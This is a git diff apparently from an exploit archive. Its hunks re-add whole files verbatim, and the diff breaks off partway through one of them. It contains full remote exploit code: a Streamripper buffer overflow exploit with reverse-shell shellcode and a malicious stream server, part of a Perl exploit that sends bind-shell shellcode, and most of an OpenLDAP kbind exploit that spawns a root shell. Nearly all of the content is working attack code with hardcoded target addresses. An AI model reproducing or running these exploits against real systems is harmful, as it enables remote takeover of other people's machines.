+"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96". +"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56". +"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1". +"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0". +"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53". +"\x89\xe1\xcd\x80"; + +my $sock = IO::Socket::INET->new('PeerAddr' => $host, + 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n"); + +$sock->autoflush(); + +print $sock "USER "; ## begin USER command with just that +print $sock "$shellcode"; ## shellcode is *userbuf is *user +print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out +print $sock "\n"; ## that simple + +sub help { + print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n"; + print "08/12/2006\n\n"; + print "perl $0 \$host \$offset\n\n"; + + print "Offsets: \n"; + print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n"; + + exit(0); +} + +# milw0rm.com [2006-08-14] diff --git a/platforms/linux/remote/220.c b/platforms/linux/remote/220.c index 8f71c591c..8e2b5ae13 100755 --- a/platforms/linux/remote/220.c +++ b/platforms/linux/remote/220.c @@ -312,6 +312,6 @@ calculate_precision (unsigned int addr_byte, int already_written_init) already_written = addr_byte; return tmp; } - - -// milw0rm.com [2000-12-06] + + +// milw0rm.com [2000-12-06] diff --git a/platforms/linux/remote/225.c b/platforms/linux/remote/225.c index dbb5a1b41..e4dd25ab9 100755 --- a/platforms/linux/remote/225.c +++ b/platforms/linux/remote/225.c @@ -221,6 +221,6 @@ _exit(-1073743151) = ? tshaw:~# */ - - -// milw0rm.com [2000-12-11] + + +// milw0rm.com [2000-12-11] diff --git a/platforms/linux/remote/226.c b/platforms/linux/remote/226.c index d9cf5c0a3..33044f8cc 100755 --- a/platforms/linux/remote/226.c +++ b/platforms/linux/remote/226.c @@ -87,6 +87,6 @@ int main(int argc, char** argv) { printf("%s", buffer); putchar('\n'); } - - -// milw0rm.com [2000-12-11] + + +// milw0rm.com [2000-12-11] diff --git a/platforms/linux/remote/227.c b/platforms/linux/remote/227.c index 475eed5fe..2884184d3 100755 --- a/platforms/linux/remote/227.c +++ b/platforms/linux/remote/227.c @@ -433,6 +433,6 @@ else return (-1); } - - -// milw0rm.com [2000-12-11] + + +// milw0rm.com [2000-12-11] diff --git a/platforms/linux/remote/2274.c b/platforms/linux/remote/2274.c index c5a4f9b69..0bf7e4e98 100755 --- a/platforms/linux/remote/2274.c +++ b/platforms/linux/remote/2274.c @@ -1,276 +1,276 @@ -/* - _______ ________ .__ _____ __ -___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ -\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ / - > <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| < -/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \ - \/ \/ \/ \/ 29\08\06 \/ |__| \/ \/ - - * mm. dM8 - * YMMMb. dMM8 _____________________________________ - * YMMMMb dMMM' [ ] - * `YMMMb dMMMP [ There are doors I have yet to open ] - * `YMMM MMM' [ windows I have yet to look through ] - * "MbdMP [ Going forward may not be the answer ] - * .dMMMMMM.P [ ] - * dMM MMMMMM [ maybe I should go back ] - * 8MMMMMMMMMMI [_____________________________________] - * YMMMMMMMMM www.netbunny.org - * "MMMMMMP - * MxM .mmm - * W"W """ - -[i] Title: Streamripper HTTP Header Parsing Buffer Overflow Exploit -[i] Discovered by: Ulf Harnhammar -[i] Exploit by: Expanders -[i] References: http://www.securityfocus.com/bid/19707 --- http://streamripper.sourceforge.net/ -[i] Greatings: x0n3-h4ck - netbunny - my girlfriend..thanks for existing - -[ Why streamripper crash? ] - -Streamripper like any other shoutcast client send an HTTP GET request to the stream server then receive a pseudo-HTTP response. -Response is made of a ICY [CODE] that show the status of the remote daemon, and a few icy- headers that stores radio informations -like Title - Website - Genre - Bitrate and a special header for song-title offset in the content stream. - -in lib/http.c [httplib_parse_sc_header()] - -[code segment] -.... -char stempbr[50]; -.... -rc = extract_header_value(header, stempbr, "icy-br:"); -.... -[/code segment] - -extract_header_value(...) calls subnstr_until(const char *str, char *until, char *newstr, int maxlen) that copies from [*str] to [*newstr] trimming -everything next [*until] for a maximum of [maxlen] bytes. - -in streamripper-1.61.25 ( maybe prior versions ) MAX_ICY_STRING costant is passed as [maxlen]. - -in lib/lib/srtypes.h - -#define MAX_ICY_STRING 4024 - -Putting all together if we send an icy-br: header 156 byte long we reach EIP overwriting. - -Code Execution is obvious possible. - -[ Timeline ] - -Vendor has been informed and version 1.61.26 has been released. - -[ Notes ] - -Exploit uses shitty hardcoded adresses, there's no registers that point to an usefull location so virtual address exploiting isn't possible. -Probably some better solution can be used but i'm really to lazy and busy to fuck my mind with that. - -[ Links ] - -www.x0n3-h4ck.org -www.netbunny.org - - - -*/ - -#include -#include -#include -#include -#include -#include -#include - -#define BUFFSIZE 200 // Buffer size - -int banner(); -int usage(char *filename); -int inject(char *port, char *ip); -int remote_connect( char* ip, unsigned short port ); - - -/* linux_ia32_reverse - Size=70 Encoder=None( hahaha streaming has no restricted 0x00 ) http://metasploit.com */ -unsigned char shellcode[] = - "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" - "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68" - "\x00\x00\x00\x00" // IP - "\x66\x68" - "\x00\x00" // PORT - "\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" - "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" - "\x89\xe1\xb0\x0b\xcd\x80"; - -char http_header[] = "ICY 200 OK\r\n" - "icy-notice1:
This stream requires Winamp
\r\n" - "icy-notice2:SHOUTcast Distributed Network Audio Server/unix v1.9.7
\r\n" - "icy-name:SEGFAULT radio\r\n" - "icy-genre:Progressive House\r\n" - "icy-url:http://www.x0n3-h4ck.org\r\n" - "content-type:audio/mpeg\r\n" - "icy-pub:1\r\n" - "icy-metaint:1\r\n" // mp3 metatags starts at first byte of content - "icy-br:"; // Finally here... - -char http_content[] = "\x0d\x0a\x0d\x0a" // \r\n\r\n - "\x04" // this magic byte can be used to control malloc(m_buffersize). m_buffersize is (this-byte * 16 ) TODO: egghunter - "\x53\x74\x72\x65\x61\x6D\x54\x69\x74\x6C\x65\x3D\x27\x45" - "\x78\x70\x61\x6E\x64\x65\x72\x73\x20\x2D\x20\x49\x27\x6C" - "\x6C\x20\x4F\x77\x6E\x20\x59\x6F\x75\x27\x3B\x53\x74\x72" - "\x65\x61\x6D\x55\x72\x6C\x3D\x27\x27\x3B\x00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00" - "\xd3\xff\xff\xf5\xff\xff\xf9\xaf\xff\xe5\x29\xbe\x3e\x8b\x18"; // a few bytes from an mp3 - - -struct retcodes{char *platform;unsigned long addr;} targets[]= { - { "Debian GNU/Linux testing/unstable" , 0xb7e70090 }, - { "Debian GNU/Linux 3.1", 0xb7e71070 }, - { "Crash daemon - DEBUGGING" , 0xdeadc0de }, - { NULL } -}; -int banner() { - printf("\n[i] Title: \tStreamripper HTTP Header Parsing BOF Exploit\n"); - printf("[i] Discovered by:\tUlf Harnhammar\n"); - printf("[i] Exploit by: \tExpanders\n\n"); - return 0; -} - -int usage(char *filename) { - int i; - printf("Usage: \t%s \n\n",filename); - printf(" \t : Local port for listener :: Default: 8000\n"); - printf(" \t : Local ip address for connectback\n"); - printf(" \t : Local port for connectback\n"); - printf(" \t : Target from the list below\n\n"); - - printf("# \t Address \t Target\n"); - printf("---------------------------------------------------------\n"); - for(i = 0; targets[i].platform; i++) - printf("%d \t 0x%08x \t %s \n",i,targets[i].addr,targets[i].platform); - printf("---------------------------------------------------------\n"); - exit(0); -} - -int inject(char *port, char *ip) -{ - unsigned long m_ip; - unsigned short m_port; - m_ip = inet_addr(ip); - m_port = htons(atoi( port )); - memcpy ( &shellcode[26], &m_ip, 4); - memcpy ( &shellcode[32], &m_port, 2); - return 0; -} - -int socket_listen( unsigned short port ) -{ - int s,reuseaddr=1; - struct sockaddr_in localaddr; - struct hostent* host_addr; - - localaddr.sin_family = AF_INET; - localaddr.sin_port = htons(port); - localaddr.sin_addr.s_addr = INADDR_ANY; - bzero(&(localaddr.sin_zero), 8); - - if ( ( s = socket(AF_INET, SOCK_STREAM, 0) ) < 0 ) - { - printf ( "[X] socket() failed!\n" ); - exit ( 1 ); - } - if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,(socklen_t)sizeof(reuseaddr)) < 0) - { - printf("[X] setsockopt() failed!\n"); - exit ( 1 ); - } - if (bind(s, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) - { - perror("[X] bind() failed\n"); - exit ( 1 ); - } - if (listen(s, 1) < 0) - { - perror("[X] listen() failed\n"); - exit ( 1 ); - } - return ( s ); -} - -int client_accept( int listener ) -{ - int s; - struct sockaddr_in remoteaddr; - int addrlen = sizeof(struct sockaddr_in); - if ((s = accept(listener, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) - { - perror("[X] accept() failed\n"); - exit ( 1 ); - } - if (getpeername(s, (struct sockaddr *)&remoteaddr, &addrlen) < 0) - { - perror("[X] getpeername() failed\n"); - exit ( 1 ); - } - printf("got connection from %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port)); - return ( s ); -} - - -int main(int argc, char *argv[]) { - int listener,client,position=0; - unsigned int rcv; - char buffer[BUFFSIZE],*request; - char recvbuf[256]; - banner(); - if( (argc != 5) || (atoi(argv[1]) < 1) || (atoi(argv[1]) > 65534) ) - usage(argv[0]); - - printf("[+] Creating evil buffer\n"); - request = (char *) malloc(BUFFSIZE + strlen(http_header) + strlen(http_content)); // +3 == \r + \n + 0x00 - memset(buffer,0x90,BUFFSIZE); // Fill with nops - - inject(argv[3],argv[2]); // Xor port and ip and put them into the shellcode - - position = 156 - strlen(shellcode); // 156 : EIP offset - memcpy(buffer+position,shellcode,strlen(shellcode)); - position += strlen(shellcode); - memcpy(buffer+position,&targets[atoi(argv[4])].addr,4); - position += 4; - memset(buffer+position,0x00,1); // End - sprintf(request,"%s%s%s",http_header,buffer,http_content); - - printf("[+] Setting up socket\n"); - listener = socket_listen(atoi(argv[1])); - - printf("[+] Waiting for client..."); - fflush(stdout); - client = client_accept(listener); - - printf("[+] Receiving GET request..."); - fflush(stdout); - rcv=recv(client,recvbuf,256,0); - if(rcv<0) - { - printf("\n[X] Error while recieving banner!\n"); - close(client); - close(listener); - exit( 1 ); - } - if (strstr(recvbuf,"1.61.25")!=0) - { - sleep(1); - printf("ok\n[+] Sending %d bytes of painfull buffer\n",strlen(request)); - if ( send ( client, request, strlen (request), 0) <= 0 ) - { - printf("[X] Failed to send buffer\n"); - exit ( 1 ); - } - printf("[+] Done - Wait for shell on port %s\n",argv[3]); - } else - printf("[X] This client is not running Streamripper or it's an unsupported version\n"); - close(client); - close(listener); - free(request); - return 0; -} - -// milw0rm.com [2006-08-29] +/* + _______ ________ .__ _____ __ +___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ +\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ / + > <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| < +/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \ + \/ \/ \/ \/ 29\08\06 \/ |__| \/ \/ + + * mm. dM8 + * YMMMb. dMM8 _____________________________________ + * YMMMMb dMMM' [ ] + * `YMMMb dMMMP [ There are doors I have yet to open ] + * `YMMM MMM' [ windows I have yet to look through ] + * "MbdMP [ Going forward may not be the answer ] + * .dMMMMMM.P [ ] + * dMM MMMMMM [ maybe I should go back ] + * 8MMMMMMMMMMI [_____________________________________] + * YMMMMMMMMM www.netbunny.org + * "MMMMMMP + * MxM .mmm + * W"W """ + +[i] Title: Streamripper HTTP Header Parsing Buffer Overflow Exploit +[i] Discovered by: Ulf Harnhammar +[i] Exploit by: Expanders +[i] References: http://www.securityfocus.com/bid/19707 --- http://streamripper.sourceforge.net/ +[i] Greatings: x0n3-h4ck - netbunny - my girlfriend..thanks for existing + +[ Why streamripper crash? ] + +Streamripper like any other shoutcast client send an HTTP GET request to the stream server then receive a pseudo-HTTP response. +Response is made of a ICY [CODE] that show the status of the remote daemon, and a few icy- headers that stores radio informations +like Title - Website - Genre - Bitrate and a special header for song-title offset in the content stream. + +in lib/http.c [httplib_parse_sc_header()] + +[code segment] +.... +char stempbr[50]; +.... +rc = extract_header_value(header, stempbr, "icy-br:"); +.... +[/code segment] + +extract_header_value(...) calls subnstr_until(const char *str, char *until, char *newstr, int maxlen) that copies from [*str] to [*newstr] trimming +everything next [*until] for a maximum of [maxlen] bytes. + +in streamripper-1.61.25 ( maybe prior versions ) MAX_ICY_STRING costant is passed as [maxlen]. + +in lib/lib/srtypes.h + +#define MAX_ICY_STRING 4024 + +Putting all together if we send an icy-br: header 156 byte long we reach EIP overwriting. + +Code Execution is obvious possible. + +[ Timeline ] + +Vendor has been informed and version 1.61.26 has been released. + +[ Notes ] + +Exploit uses shitty hardcoded adresses, there's no registers that point to an usefull location so virtual address exploiting isn't possible. +Probably some better solution can be used but i'm really to lazy and busy to fuck my mind with that. + +[ Links ] + +www.x0n3-h4ck.org +www.netbunny.org + + + +*/ + +#include +#include +#include +#include +#include +#include +#include + +#define BUFFSIZE 200 // Buffer size + +int banner(); +int usage(char *filename); +int inject(char *port, char *ip); +int remote_connect( char* ip, unsigned short port ); + + +/* linux_ia32_reverse - Size=70 Encoder=None( hahaha streaming has no restricted 0x00 ) http://metasploit.com */ +unsigned char shellcode[] = + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" + "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68" + "\x00\x00\x00\x00" // IP + "\x66\x68" + "\x00\x00" // PORT + "\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" + "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" + "\x89\xe1\xb0\x0b\xcd\x80"; + +char http_header[] = "ICY 200 OK\r\n" + "icy-notice1:
This stream requires Winamp
\r\n" + "icy-notice2:SHOUTcast Distributed Network Audio Server/unix v1.9.7
\r\n" + "icy-name:SEGFAULT radio\r\n" + "icy-genre:Progressive House\r\n" + "icy-url:http://www.x0n3-h4ck.org\r\n" + "content-type:audio/mpeg\r\n" + "icy-pub:1\r\n" + "icy-metaint:1\r\n" // mp3 metatags starts at first byte of content + "icy-br:"; // Finally here... + +char http_content[] = "\x0d\x0a\x0d\x0a" // \r\n\r\n + "\x04" // this magic byte can be used to control malloc(m_buffersize). m_buffersize is (this-byte * 16 ) TODO: egghunter + "\x53\x74\x72\x65\x61\x6D\x54\x69\x74\x6C\x65\x3D\x27\x45" + "\x78\x70\x61\x6E\x64\x65\x72\x73\x20\x2D\x20\x49\x27\x6C" + "\x6C\x20\x4F\x77\x6E\x20\x59\x6F\x75\x27\x3B\x53\x74\x72" + "\x65\x61\x6D\x55\x72\x6C\x3D\x27\x27\x3B\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\xd3\xff\xff\xf5\xff\xff\xf9\xaf\xff\xe5\x29\xbe\x3e\x8b\x18"; // a few bytes from an mp3 + + +struct retcodes{char *platform;unsigned long addr;} targets[]= { + { "Debian GNU/Linux testing/unstable" , 0xb7e70090 }, + { "Debian GNU/Linux 3.1", 0xb7e71070 }, + { "Crash daemon - DEBUGGING" , 0xdeadc0de }, + { NULL } +}; +int banner() { + printf("\n[i] Title: \tStreamripper HTTP Header Parsing BOF Exploit\n"); + printf("[i] Discovered by:\tUlf Harnhammar\n"); + printf("[i] Exploit by: \tExpanders\n\n"); + return 0; +} + +int usage(char *filename) { + int i; + printf("Usage: \t%s \n\n",filename); + printf(" \t : Local port for listener :: Default: 8000\n"); + printf(" \t : Local ip address for connectback\n"); + printf(" \t : Local port for connectback\n"); + printf(" \t : Target from the list below\n\n"); + + printf("# \t Address \t Target\n"); + printf("---------------------------------------------------------\n"); + for(i = 0; targets[i].platform; i++) + printf("%d \t 0x%08x \t %s \n",i,targets[i].addr,targets[i].platform); + printf("---------------------------------------------------------\n"); + exit(0); +} + +int inject(char *port, char *ip) +{ + unsigned long m_ip; + unsigned short m_port; + m_ip = inet_addr(ip); + m_port = htons(atoi( port )); + memcpy ( &shellcode[26], &m_ip, 4); + memcpy ( &shellcode[32], &m_port, 2); + return 0; +} + +int socket_listen( unsigned short port ) +{ + int s,reuseaddr=1; + struct sockaddr_in localaddr; + struct hostent* host_addr; + + localaddr.sin_family = AF_INET; + localaddr.sin_port = htons(port); + localaddr.sin_addr.s_addr = INADDR_ANY; + bzero(&(localaddr.sin_zero), 8); + + if ( ( s = socket(AF_INET, SOCK_STREAM, 0) ) < 0 ) + { + printf ( "[X] socket() failed!\n" ); + exit ( 1 ); + } + if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,(socklen_t)sizeof(reuseaddr)) < 0) + { + printf("[X] setsockopt() failed!\n"); + exit ( 1 ); + } + if (bind(s, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) + { + perror("[X] bind() failed\n"); + exit ( 1 ); + } + if (listen(s, 1) < 0) + { + perror("[X] listen() failed\n"); + exit ( 1 ); + } + return ( s ); +} + +int client_accept( int listener ) +{ + int s; + struct sockaddr_in remoteaddr; + int addrlen = sizeof(struct sockaddr_in); + if ((s = accept(listener, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) + { + perror("[X] accept() failed\n"); + exit ( 1 ); + } + if (getpeername(s, (struct sockaddr *)&remoteaddr, &addrlen) < 0) + { + perror("[X] getpeername() failed\n"); + exit ( 1 ); + } + printf("got connection from %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port)); + return ( s ); +} + + +int main(int argc, char *argv[]) { + int listener,client,position=0; + unsigned int rcv; + char buffer[BUFFSIZE],*request; + char recvbuf[256]; + banner(); + if( (argc != 5) || (atoi(argv[1]) < 1) || (atoi(argv[1]) > 65534) ) + usage(argv[0]); + + printf("[+] Creating evil buffer\n"); + request = (char *) malloc(BUFFSIZE + strlen(http_header) + strlen(http_content)); // +3 == \r + \n + 0x00 + memset(buffer,0x90,BUFFSIZE); // Fill with nops + + inject(argv[3],argv[2]); // Xor port and ip and put them into the shellcode + + position = 156 - strlen(shellcode); // 156 : EIP offset + memcpy(buffer+position,shellcode,strlen(shellcode)); + position += strlen(shellcode); + memcpy(buffer+position,&targets[atoi(argv[4])].addr,4); + position += 4; + memset(buffer+position,0x00,1); // End + sprintf(request,"%s%s%s",http_header,buffer,http_content); + + printf("[+] Setting up socket\n"); + listener = socket_listen(atoi(argv[1])); + + printf("[+] Waiting for client..."); + fflush(stdout); + client = client_accept(listener); + + printf("[+] Receiving GET request..."); + fflush(stdout); + rcv=recv(client,recvbuf,256,0); + if(rcv<0) + { + printf("\n[X] Error while recieving banner!\n"); + close(client); + close(listener); + exit( 1 ); + } + if (strstr(recvbuf,"1.61.25")!=0) + { + sleep(1); + printf("ok\n[+] Sending %d bytes of painfull buffer\n",strlen(request)); + if ( send ( client, request, strlen (request), 0) <= 0 ) + { + printf("[X] Failed to send buffer\n"); + exit ( 1 ); + } + printf("[+] Done - Wait for shell on port %s\n",argv[3]); + } else + printf("[X] This client is not running Streamripper or it's an unsupported version\n"); + close(client); + close(listener); + free(request); + return 0; +} + +// milw0rm.com [2006-08-29] diff --git a/platforms/linux/remote/230.c b/platforms/linux/remote/230.c index 2194cf25a..a5fff94cf 100755 --- a/platforms/linux/remote/230.c +++ b/platforms/linux/remote/230.c @@ -395,6 +395,6 @@ void usage(char *prog) printf("-c where we start to control the format string\n\n"); exit(0); } - - -// milw0rm.com [2000-12-15] + + +// milw0rm.com [2000-12-15] diff --git a/platforms/linux/remote/237.c b/platforms/linux/remote/237.c index 82dffdd05..c7d028e74 100755 --- a/platforms/linux/remote/237.c +++ b/platforms/linux/remote/237.c @@ -207,6 +207,6 @@ bool wrongPacket(TCP *p1, TCP *p2) return true; return false; } - - -// milw0rm.com [2001-01-02] + + +// milw0rm.com [2001-01-02] diff --git a/platforms/linux/remote/27.pl b/platforms/linux/remote/27.pl index a07f3c7e3..2f8a6f161 100755 --- a/platforms/linux/remote/27.pl +++ b/platforms/linux/remote/27.pl @@ -104,6 +104,6 @@ response\n"; } close LOG; - - -# milw0rm.com [2003-05-05] + + +# milw0rm.com [2003-05-05] diff --git a/platforms/linux/remote/277.c b/platforms/linux/remote/277.c index 37f5c38d5..8ffcadc0c 100755 --- a/platforms/linux/remote/277.c +++ b/platforms/linux/remote/277.c @@ -294,6 +294,6 @@ encode_dns_name (char *buf, int len, int embed_pos) } *buf=0x00; // finish with a 0 } - - -// milw0rm.com [2001-03-01] + + +// milw0rm.com [2001-03-01] diff --git a/platforms/linux/remote/279.c b/platforms/linux/remote/279.c index 1d16df1cc..7469ce883 100755 --- a/platforms/linux/remote/279.c +++ b/platforms/linux/remote/279.c @@ -236,6 +236,6 @@ int main(int argc,char **argv){ err: perror("error");exit(-1); } - - -// milw0rm.com [2001-03-01] + + +// milw0rm.com [2001-03-01] diff --git a/platforms/linux/remote/282.c b/platforms/linux/remote/282.c index 7ac25375a..b2f9955ed 100755 --- a/platforms/linux/remote/282.c +++ b/platforms/linux/remote/282.c @@ -560,6 +560,6 @@ int main(int argc, char* argv[]) connection(sa); return(0); -} - -// milw0rm.com [2001-03-02] +} + +// milw0rm.com [2001-03-02] diff --git a/platforms/linux/remote/2933.c b/platforms/linux/remote/2933.c index 5a7382f1d..5c2d3db6c 100755 --- a/platforms/linux/remote/2933.c +++ b/platforms/linux/remote/2933.c @@ -1,381 +1,381 @@ -/* - * openldap-kbind-p00f.c - OpenLDAP kbind remote exploit - * - * Only works on servers compiled with - * --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no] - * - * by Solar Eclipse - * - * Shoutouts to LSD for their l33t asm code and to all 0dd people - * - * Private 0dd code. - * - */ - -#include -#include -#include -#include -#include -#include - -extern int errno; - -#define SHELLCODE_LEN (1250+2+32) -#define SHELLCODE_ADDR 0xbf5feed0 - -#define LDAP_AUTH_SIMPLE 0x80U -#define LDAP_AUTH_KRBV41 0x81U - -#define FINDSCKPORTOFS 46 - -u_char shellcode[]= -/* 72 bytes findsckcode by LSD-pl */ - "\x31\xdb" /* xorl %ebx,%ebx */ - "\x89\xe7" /* movl %esp,%edi */ - "\x8d\x77\x10" /* leal 0x10(%edi),%esi */ - "\x89\x77\x04" /* movl %esi,0x4(%edi) */ - "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */ - "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */ - "\xb3\x10" /* movb $0x10,%bl */ - "\x89\x19" /* movl %ebx,(%ecx) */ - "\x31\xc9" /* xorl %ecx,%ecx */ - "\xb1\xff" /* movb $0xff,%cl */ - "\x89\x0f" /* movl %ecx,(%edi) */ - "\x51" /* pushl %ecx */ - "\x31\xc0" /* xorl %eax,%eax */ - "\xb0\x66" /* movb $0x66,%al */ - "\xb3\x07" /* movb $0x07,%bl */ - "\x89\xf9" /* movl %edi,%ecx */ - "\xcd\x80" /* int $0x80 */ - "\x59" /* popl %ecx */ - "\x31\xdb" /* xorl %ebx,%ebx */ - "\x39\xd8" /* cmpl %ebx,%eax */ - "\x75\x0a" /* jne */ - "\x66\xb8\x12\x34" /* movw $0x1234,%bx */ - "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */ - "\x74\x02" /* je */ - "\xe2\xe0" /* loop */ - "\x89\xcb" /* movl %ecx,%ebx */ - "\x31\xc9" /* xorl %ecx,%ecx */ - "\xb1\x03" /* movb $0x03,%cl */ - "\x31\xc0" /* xorl %eax,%eax */ - "\xb0\x3f" /* movb $0x3f,%al */ - "\x49" /* decl %ecx */ - "\xcd\x80" /* int $0x80 */ - "\x41" /* incl %ecx */ - "\xe2\xf6" /* loop */ - -/* 10 byte setresuid(0,0,0); by core */ - "\x31\xc9" /* xor %ecx,%ecx */ - "\xf7\xe1" /* mul %ecx,%eax */ - "\x51" /* push %ecx */ - "\x5b" /* pop %ebx */ - "\xb0\xa4" /* mov $0xa4,%al */ - "\xcd\x80" /* int $0x80 */ - -/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */ - "\x31\xc0" /* xorl %eax,%eax */ - "\x50" /* pushl %eax */ - "\x68""//sh" /* pushl $0x68732f2f */ - "\x68""/bin" /* pushl $0x6e69622f */ - "\x89\xe3" /* movl %esp,%ebx */ - "\x50" /* pushl %eax */ - "\x53" /* pushl %ebx */ - "\x89\xe1" /* movl %esp,%ecx */ - "\x99" /* cdql */ - "\xb0\x0b" /* movb $0x0b,%al */ - "\xcd\x80" /* int $0x80 */ -; - -#define COMMAND1 "echo 'a'; TERM=xterm; export TERM=xterm; exec bash -i;\n" -#define COMMAND2 "uname -a; id; w;\n" - -/* mixter's code w/enhancements by core */ - -int sh(int sockfd) { - char snd[1024], rcv[1024]; - fd_set rset; - int maxfd, n; - - /* Priming commands */ - strcpy(snd, COMMAND1 "\n"); - write(sockfd, snd, strlen(snd)); - - strcpy(snd, COMMAND2 "\n"); - write(sockfd, snd, strlen(snd)); - - /* Main command loop */ - for (;;) { - FD_SET(fileno(stdin), &rset); - FD_SET(sockfd, &rset); - - maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1; - select(maxfd, &rset, NULL, NULL, NULL); - - if (FD_ISSET(fileno(stdin), &rset)) { - bzero(snd, sizeof(snd)); - fgets(snd, sizeof(snd)-2, stdin); - write(sockfd, snd, strlen(snd)); - } - - if (FD_ISSET(sockfd, &rset)) { - bzero(rcv, sizeof(rcv)); - - if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) { - printf("Good Bye!\n"); - return 0; - } - - if (n < 0) { - perror("read"); - return 1; - } - - fputs(rcv, stdout); - fflush(stdout); /* keeps output nice */ - } - } /* for(;;) */ -} - -/* Connect to the host */ -int connect_host(char* host, int port) -{ - struct sockaddr_in s_in; - int sock; - - s_in.sin_family = AF_INET; - s_in.sin_addr.s_addr = inet_addr(host); - s_in.sin_port = htons(port); - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) { - printf("Could not create a socket\n"); - exit(1); - } - - if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) { - printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno)); - exit(1); - } - - return sock; -} - -int get_local_port(int sock) -{ - struct sockaddr_in s_in; - int namelen = sizeof(s_in); - - if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) { - printf("Can't get local port: %s\n", strerror(errno)); - exit(1); - } - - return s_in.sin_port; -} - -int read_data(int sock, char* buf, int len) -{ - int l; - int to_read = len; - - do { - if ((l = read(sock, buf, to_read)) < 0) { - printf("Error in read: %s\n", strerror(errno)); - exit(1); - } - to_read -= len; - } while (to_read > 0); - - return len; -} - -int read_bind_result(int sock) -{ - char buf[1000]; - - read_data(sock, buf, 2); - if (buf[0] != 0x30) { - /* openldap is 0wned :-P */ - return -1; - } - - read_data(sock, &buf[2], buf[1]); - - if ((buf[2] != 0x02) && (buf[3] != 0x01)) { /* message id */ - printf("Malformed bind result\n"); - exit(1); - } - - if (buf[5] != 0x61) { /* message type */ - printf("Malformed bind result\n"); - exit(1); - } - - if (buf[6] < 7) { /* message length */ - printf("Malformed bind result\n"); - exit(1); - } - - if ((buf[7] != 0x0a) && (buf[8] != 0x01)) { /* result code */ - printf("Malformed bind result\n"); - exit(1); - } - - return buf[9]; /* result code */ -} - -int send_bind_request(int sock, char method, char* dn, char* cred) -{ - int cred_len, message_len, request_len; - char krb_bind_request[2000]; - char* p; - - memcpy(krb_bind_request, - "\x30\x82\xff\xff" /* request length */ - "\x02\x01\x01" /* message id = 1 */ - "\x60" /* bind request */ - "\x82\xff\xff" /* message length */ - "\x02\x01\x02" /* LDAP version 3 */ - "\x04", /* dn */ - 15); - - p = &krb_bind_request[15]; - - if (strlen(dn) > 255) { - printf("bind_dn too long\n"); - exit(1); - } - - *p++ = (char)strlen(dn); - strcpy(p, dn); - - p += strlen(dn); - - *p++ = method; /* authentication method */ - *p++ = '\x82'; - - cred_len = strlen(cred); - - *p++ = (char) ((cred_len >> 8) & 0xff); - *p++ = (char) (cred_len & 0xff); - - strcpy(p, cred); - - message_len = 5 + strlen(dn) + 4 + cred_len; - krb_bind_request[9] = (char) ((message_len >> 8) & 0xff); - krb_bind_request[10] = (char) (message_len & 0xff); - - request_len = 7 + message_len; - krb_bind_request[2] = (char) ((request_len >> 8) & 0xff); - krb_bind_request[3] = (char) (request_len & 0xff); - - send(sock, krb_bind_request, 4+request_len, 0); -} - -void build_shellcode(char* p, int len) -{ - int i; - - i = len - 64 - strlen(shellcode); - memset(p, 0x90, i); - strncpy(&p[i], shellcode, strlen(shellcode)); - - for (i = len - 64; i < len; i+= 4) { - *(int*)&p[i] = SHELLCODE_ADDR; - } -} - -char res_buf[30]; - -char* ldap_result(int code) { - switch (code) { - case 0x00: return "LDAP_SUCCESS (0x00)"; - case 0x01: 